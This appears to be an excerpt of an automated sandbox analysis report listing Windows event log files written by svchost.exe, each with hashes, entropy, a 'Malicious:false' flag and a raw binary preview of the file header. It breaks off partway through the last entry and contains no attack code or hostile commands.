                                                                        Preview:ElfChnk.........@...............@........... s...t..?h......................................................................._R;................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................w...................._..........**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.8167930057519079
                                                                        Encrypted:false
                                                                        SSDEEP:384:bhGuZumutu4uEu5uOuDuyb2uPu1uyuKtuLujuVgqu:bb+
                                                                        MD5:EBB9255F7BBA5C52CE625D69FE52F60A
                                                                        SHA1:20F226B11EF3A69F56A13A5BF7530E199BFDE310
                                                                        SHA-256:5AB28568919B051FA95E534049B8BA9E606EEF6EAB53EB0ADB71545C0ED2A380
                                                                        SHA-512:D8788F58A8DE7C9BD6F7075DC65606508D14C8AD8AC75E8992174A4D35328E70635AEC36531DA5E81A8DABD931092576C60C5B831C73670D856A40BD2427CB8E
                                                                        Malicious:false
                                                                        Preview:ElfChnk......................................"..x$...k.3....................................................................$.#.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................................................................>...........**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.235001208884112
                                                                        Encrypted:false
                                                                        SSDEEP:384:iGhRAEA/sA/8A/gA/lA/KA/EA/DA/ZA/oA/nA//A/PAzyEAuA8AjCbALuAMAKAtZ:J0hVi+KLN61G
                                                                        MD5:50EF6DB57587CF27291B2DED1AD3C542
                                                                        SHA1:ECF5C56F998FCA95BE4BA119DC5E241C693DB891
                                                                        SHA-256:14AD1DF267604F097745CC1A5C2DC6EDFEABF7E89A69A194B5433363A847F530
                                                                        SHA-512:E774A896DA5119D270D59E02DF113CF3E2FC774A24A0A7BDDB39E5D5D614B1F905BAA81FF59790811CAF51B4B92854A06C042D869EA2C52AB19E955E9BB00E4F
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........!...............!...........x.......<......................................................................t..................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F....................................................{...........................................f......................................&....j......**...............>............F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):3.1601920702980912
                                                                        Encrypted:false
                                                                        SSDEEP:384:NhwpsWp90Np9b5p9ihp95lp949p9/pp9Wpp9tlp98Jp9jdp9qBp9BJp9A1Z1p9nP:NRZfQI5
                                                                        MD5:1A84D5BFFC6A51A8E813CA9870D46851
                                                                        SHA1:62201D49F347A7BEEA7D58DCB45D173ADBD53887
                                                                        SHA-256:CBF067DCF2548398B87EB882B7A1F26EC7989DBB4D105C4495020D63E9B5E0D8
                                                                        SHA-512:8B3198C3534387FEF8B8120ED0111F6EA02BD21FC3E8C4E74C4936BE18581C80BEF58EB512E111FF0143361E488F1F7C7D3151664E0F4FD996169C894162B24C
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........'...............'..................._.z.......................................................................j.........................................<...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**............................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.0114620219781365
                                                                        Encrypted:false
                                                                        SSDEEP:384:jhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBo:jwDoh1VvpE0Y5RA8sQ
                                                                        MD5:70F943A767EE17A83B03D620404602D6
                                                                        SHA1:26A2A2C8690D3F47D6192DDC29079CA4DE7507A6
                                                                        SHA-256:AAE4D860D5B31157D69935C9A68A8958EF96D9EBB7AB346B8F750E7FD339FBE5
                                                                        SHA-512:88CAB5E94A82F49036C5DC4A3C3DE94BADB9A2244C4A32DAE6A23DFD751553B0FF9953C21B02CA0396D5DBF529C75B57D1A65D9EA86CE86D8D081E63E464D521
                                                                        Malicious:false
                                                                        Preview:ElfChnk.\...............\.............................G......................................................................\O................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..^...........**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.165801171629505
                                                                        Encrypted:false
                                                                        SSDEEP:384:thwCCRzCaCkClCzCYC/CyCVCGCMCvCtlCaf2Ca9CaECaAzCaFECa:tKFD
                                                                        MD5:9236B0363C2E488481D99C2A3B97F664
                                                                        SHA1:7DF4CAC91226C2E2E36DB78D931D4D8386177406
                                                                        SHA-256:968CA40848BDBDDB24126CF3BA1EFE51973835B62A841A13ABBC3F3F76E2AAEC
                                                                        SHA-512:7ADE9B5AE3499BB97FBBCAD1F38F530E9592F4CB4AC3472553A340E0D172704CDD3EA2DE39914F5A2ACB87934037EFDE369AF960256269AC221B5AD9724BE31C
                                                                        Malicious:false
                                                                        Preview:ElfChnk.....................................04..h6...j........................................................................o................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................v)....../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):109032
                                                                        Entropy (8bit):4.4772585425341225
                                                                        Encrypted:false
                                                                        SSDEEP:384:cDhWFK4KUK9KDKkKZKRKkKGxKTKMKxK2KqMqYvMaDMzMBYxMBYYK1KzKRKAKmKE5:cDAL1FX3eaMDAL1Fl
                                                                        MD5:B6D62377EAD3AFB2E9DAE89DAE289F72
                                                                        SHA1:51D6D84B1846B8C976DEC4496322100F0C705C07
                                                                        SHA-256:5B06E81D9C750B7DF9D3AD5ACA700438D970DE9D882B75230B37D02BB5863DB1
                                                                        SHA-512:A2A39400AB7B6409F428B6C28255E7D9178C88CC5376E2B4C672550855314F581A22C625B7C20E41C3F0770842A724B62BC6C706E2FB39871BDACC8F332097C4
                                                                        Malicious:false
                                                                        Preview:ElfChnk..&.......&.......&.......&..........0........j.......................................................................!.................4.......................\...=...........................................................................................................................f...............?...........................m...................M...F.......................S....................................3..................................-0..................#...................&...........**..H....&......uwW...........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.1810965962810462
                                                                        Encrypted:false
                                                                        SSDEEP:384:vhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm7UmLcUmWUmnUm:vY7LU
                                                                        MD5:9D9C182984FF3C8DAFD9D7D27F9461F0
                                                                        SHA1:72E2D06B61F085737906AD835D09009CFD047203
                                                                        SHA-256:C3D5C4AD8C13B39C1EC967B6A9DFCA4ACC94E48C00D1BFAA3BCC5D7B6B134EC2
                                                                        SHA-512:2906BF522ABB70A1E2F3F3DE63C732CCAC103B7F8D54CECF22730ED08A64BA1F6243CBC95EE1F1568ED45B7E608B60303B31B7A67EFDF52778CD239FF41F58E9
                                                                        Malicious:false
                                                                        Preview:ElfChnk......................................1..(4.............................................................................................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&............................................................................................................*..........**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.20420872809676538
                                                                        Encrypted:false
                                                                        SSDEEP:48:MeVWd8ycrP+8QNRBEZWTENO4brBT3oy/6y:J2NVaO8Joy/6y
                                                                        MD5:663BDDB3C4AB17C683DEB9F1CB376E35
                                                                        SHA1:85A47FCC12318330D404128C559F256D271BE661
                                                                        SHA-256:4EBCBE28F5FFD9240FDC2DED6105A51E2A2ECB1F91BF30D1D269B27D0C87CBE5
                                                                        SHA-512:00D9BBE754427A57E14B6779FCA2ACB266DD2A59442E37426F43F2FF7490DCCB3E32AA432C5ECB8DCD4AFDF4E3A8CE04E25D6E76DC061E935218C618DC81C145
                                                                        Malicious:false
                                                                        Preview:ElfChnk..............................................)&........................................................................................".......................J...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**................x..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.07967961973305
                                                                        Encrypted:false
                                                                        SSDEEP:384:VhIivhiuiMidiyiMi3iEiziXviiqYiMciEiri9iuiLsRi11iWiRmiNiHibifiGiS:VjZvaQKtM9QSp
                                                                        MD5:C0228093C6D68E6BF2A2919C4757E19E
                                                                        SHA1:4C30BEAA7AB56231126956EC83C6B9159B7C7809
                                                                        SHA-256:214406B4B4C04186B2955537F29AC633824792BABF9EE5051B0857CCF9AE2763
                                                                        SHA-512:B0E558BEF4B6A43636B87FDAA598BF8329E15920503ED2460B4D0B251BBB29B9CFAC37D35AC5DB0890A65F80A1F6F6AD85A0613CA36E550E70FE1A4354B2CE9F
                                                                        Malicious:false
                                                                        Preview:ElfChnk.y...............y....................g...i..4........................................................................L..................#..a.......................=.......................#...................................................................................................f...............?................'......P.......................M...F............................................#..............................................................................w#.......'...0..........**......y.......>}.T............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.32765835679697
                                                                        Encrypted:false
                                                                        SSDEEP:768:ZZaQL9aHavaLanajaPaTaCaRaEa0aWaKaEaValapaqamaEaFataXaZaVaNada5al:PL
                                                                        MD5:AEA57E77876E4A7F0E2C5C4BCAFC69B1
                                                                        SHA1:E930CDBD8B51DAD1B184C23FAF8A01091C1973D7
                                                                        SHA-256:68BD78CF380327C273E131FA4545E9B9C867555330C2FC364D934A0148FFC7B8
                                                                        SHA-512:A96B44DB0804046D3128C1F44374AA5E718780C1B9DB284CBA79FA67C678673A97A374856F21524B855BD1830FDDE769DDA5799E86C6281D459CD7CAF8ADD74D
                                                                        Malicious:false
                                                                        Preview:ElfChnk......................................I...L..B........................................................................c.o................b...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................;.......................&...........**..X............,.x..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.3642612685419924
                                                                        Encrypted:false
                                                                        SSDEEP:384:dhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJ1qXJNXJLJXJxXJBXJfXJKH5:dQ0yUkNYwD8imLEUzL/HXxS
                                                                        MD5:727E32931085339B0D59890FD3759197
                                                                        SHA1:1281993447169E4AF0F4EEDE4F70524D766189F6
                                                                        SHA-256:66D8CFCF522ABCC5813640D9315FB0FC1497236FEBAE41E1095547E137759BFD
                                                                        SHA-512:24BF05FA33772320686E4BD6BF32512DD7BE460393304178292B93E7440B7D198A603C9EB45CCED0479A651C5D752B8E688A207B05E180793D41581E3AACE2FC
                                                                        Malicious:false
                                                                        Preview:ElfChnk......................................A...D....n........................................................................h................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........................................................C................3..........**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.339319118040676
                                                                        Encrypted:false
                                                                        SSDEEP:384:mh/mcmtmrmsm1mkmQm6m4mnmdmgmsmnmChmxmomMmqmwmHmLmlm9mGmdmpm3mfmP:mNDcxPuxE9KA
                                                                        MD5:F2254833A2ECFC2BE8343C689060E95C
                                                                        SHA1:4E4CE2B2AE58A6A2EFB7D563F17DCBA59A83D2A7
                                                                        SHA-256:A8B52451086D3042E2353D49E565422A083018D22C89F8447889BA77312DEA65
                                                                        SHA-512:38DB34911D61CA2EFE5767C0344BEFF5D81ECEB09B6F7C1F8BC34F0E6F8DEBBB010471A78AA181D4F43941C91AB5C6DFD1D26970AE766E1E208DA776D4FC5FA5
                                                                        Malicious:false
                                                                        Preview:ElfChnk.....................................@)...*.........................................................................[=.t................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...............................................s...........................................%...........................................&...........**..p.............k...........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.7077930323266531
                                                                        Encrypted:false
                                                                        SSDEEP:384:ohK2nl2U52N2h2Ii2wAx2wI2ff2iW2R12Qc2nT2:op
                                                                        MD5:EFAB9CB2241340892CAF25215B175900
                                                                        SHA1:379AAFFC0E9465FBC553A8CD7587F45D07274D24
                                                                        SHA-256:852B282863F4AD8B40A1CB715C9F3EA8B243472EF1D9E95035408AB586EB49BC
                                                                        SHA-512:2702DFE388394AE71F7D2F012E3003F2D3586A5CC2300605D2FF2B14A3F99E4F7443D37203E9EB37101510406C34B6258063807359C31DEDDFE2177ADCB8CBA7
                                                                        Malicious:false
                                                                        Preview:ElfChnk...............................................k.....................................................................O..w................N.......................v...=...........................................................................................................................f...............?...........................m...................M...F...............................'.......................................................................................................&...........**...............a............F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):3184
                                                                        Entropy (8bit):4.0379871292529
                                                                        Encrypted:false
                                                                        SSDEEP:48:MkJyeZshh/NGUmJfJ4YmqyfBIbAiJfJHyCZmJfJL9yCPHkhJfJf4gboV:NSz/gTRRyfObfRRJmRh9/HkhRGui
                                                                        MD5:F850DE8F3D91F9D9ED2E0BA4C1D7E3DC
                                                                        SHA1:329E64FEDA0487DB45B4ACE9020D36B59A2C43A6
                                                                        SHA-256:D27B8724F81B55FD1FFC4E708D225C72FD2EF41E2A82E9BC3703C0A51765714E
                                                                        SHA-512:B48F960885E9E3D194C2C957AED8799661F54BF37D63B2C4299EA16C27CD5D51E180757655EC5D0EE1A9D55B2149BA8A313907F1AC6CDE2DDEA8C6E22A7D094B
                                                                        Malicious:false
                                                                        Preview:ElfChnk.............................................|.\W.....................................................................L`................................N ....... ..=.......................................h#......................}...3............................ ........... ..............f...h...........?.......................h.......Y.......M.......M...F...........................................f?......................................................A.......A#......................&...............**...............d^.6............f?..............................................................<.......T...-.!................@.d^.6..._....b.K...z..$Ox...@........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l..............*...................P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.......w.m.i.p.r.v.s.e...e.x.e...x...".%.P.r.o.g.r.a.m.D.a.t.a.%.\.M.i.c

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.269282050125859
                                                                        Encrypted:false
                                                                        SSDEEP:384:Vhghshy2h0hEhDh9vhghp6hXghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLha8:VbsFpkBSqL8wD
                                                                        MD5:A58CC6DEC3C876BEEC16907FC49E19BA
                                                                        SHA1:C2617D099C46BD902D85BD8FE90FC6F34995BA5A
                                                                        SHA-256:BE9A153D8CFAB9F25D94444C14641599D6F8C868DB9675D3FA330E0C7C0110A6
                                                                        SHA-512:4311D7F2C987CCE1F5EE8F78B867A87BFDE8D5E28C996B2BF1347B41063F38B6CB98BE968A962064C5920B9F355AA537FE5370FB78D52C69F5B81B279C394D5D
                                                                        Malicious:false
                                                                        Preview:ElfChnk.............................................b.......................................................................<...........................................l...=...........................................................................................................................f...............?...........................m...................M...F...........................................a.......................................................................................9...&...........**..@.........................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.2593916356001515
                                                                        Encrypted:false
                                                                        SSDEEP:384:ahOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOV5VqVFlVmV8VVG:ayjbS
                                                                        MD5:14652E4148A13AE019B3CF2CC20B5812
                                                                        SHA1:0D6C33AC1CF9CF3EDB3B4632A0943BC7ED7521FC
                                                                        SHA-256:3946831B472B0248BBBB225A2253A26A693E9155C3FFF0D8CE29897E07573134
                                                                        SHA-512:0306DB2CBFEB878570FF4B4342CD6E89B056D9FE7E41029CE17FD08953749351EB65C8B942D36EB7842F6167219997D876270DC0B5528F4FFC13EB310B8F0324
                                                                        Malicious:false
                                                                        Preview:ElfChnk........."..............."...........`8...9....H4......................................................................4.................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v...........................................................................&*..........**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 101, DIRTY
                                                                        Category:dropped
                                                                        Size (bytes):129944
                                                                        Entropy (8bit):4.193933238266943
                                                                        Encrypted:false
                                                                        SSDEEP:768:rL5v0NuJKOXvb6mBylNGkVdNWN/3kUbzVVRa6vwVQldASo0RXk9gjdkINbRkmkb8:JhBlXhBl
                                                                        MD5:D5A6BC6D8DDE44574DE4EC24E2526D8F
                                                                        SHA1:7E05C32C7047010EE573E8954449768F0CE82CC2
                                                                        SHA-256:FD693AB0DC6BAEF3572ACF7F64AA75F91F434D8343BED199CA18287DB8416EDF
                                                                        SHA-512:0E77B86DCAFD8446783245822EE3C00261F5C7166CD2EE4E30323AC8305F3D5B4FA1E3D98DF64AC9DA93E79B7A3CB2BA2755785E8B8A491DEFD5AAC80AC24743
                                                                        Malicious:false
                                                                        Preview:ElfFile.................e.......................................................................................................ElfChnk.........g...............g...................6D........................................................................h ........................................B...=...........................................................................................................................f...............?...........................m...................M...F...................................=.......E...............&...........................................................-...........................**..X...........|.$2..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.321255744338126
                                                                        Encrypted:false
                                                                        SSDEEP:384:nh4BwBxNqObx1rBwBwQtBwBnp+/0JBwBc/wBwBwtBwBwUBwBAszBwB1BwB2WBwBc:n/NqObx/lsKeQfcjDsM
                                                                        MD5:A3669CF64CFD0978933A9CC3482C1282
